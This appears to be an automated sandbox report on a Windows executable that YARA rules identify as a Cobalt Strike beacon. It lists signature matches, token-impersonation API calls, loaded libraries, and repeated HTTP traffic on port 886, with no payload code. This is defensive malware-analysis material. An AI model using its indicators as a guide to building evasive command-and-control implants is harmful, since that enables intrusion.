Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: Process Memory Space: cH0s914NeF.exe PID: 4304, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: cH0s914NeF.exe PID: 4304, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: cH0s914NeF.exe PID: 4304, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/1@0/1

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A6FE7C LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

0_2_03A6FE7C

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A76CB0 TerminateProcess,GetLastError,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,htonl,htonl,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_03A76CB0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03

Source: cH0s914NeF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cH0s914NeF.exe	ReversingLabs: Detection: 55%
Source: cH0s914NeF.exe	Virustotal: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\cH0s914NeF.exe "C:\Users\user\Desktop\cH0s914NeF.exe"
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: cH0s914NeF.exe

Static file information: File size 2434849 > 1048576

Source: cH0s914NeF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A8E0E4 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,

0_2_03A8E0E4

Source: cH0s914NeF.exe

Static PE information: real checksum: 0x255d0a should be: 0x25777d

Source: cH0s914NeF.exe	Static PE information: section name: .xdata
Source: cH0s914NeF.exe	Static PE information: section name: /4
Source: cH0s914NeF.exe	Static PE information: section name: /19
Source: cH0s914NeF.exe	Static PE information: section name: /31
Source: cH0s914NeF.exe	Static PE information: section name: /45
Source: cH0s914NeF.exe	Static PE information: section name: /57
Source: cH0s914NeF.exe	Static PE information: section name: /70
Source: cH0s914NeF.exe	Static PE information: section name: /81
Source: cH0s914NeF.exe	Static PE information: section name: /92

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A9716C push 0000006Ah; retf	0_2_03A97184
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0366B19F push ebp; iretd	0_2_0366B1A0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_036697A4 push edi; iretd	0_2_036697A5
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03669B65 push cs; retf	0_2_03669B66
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03688B76 push ebp; iretd	0_2_03688B77
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03688B56 push ebp; iretd	0_2_03688B57
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03688B9F push ebp; iretd	0_2_03688BA0

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 886
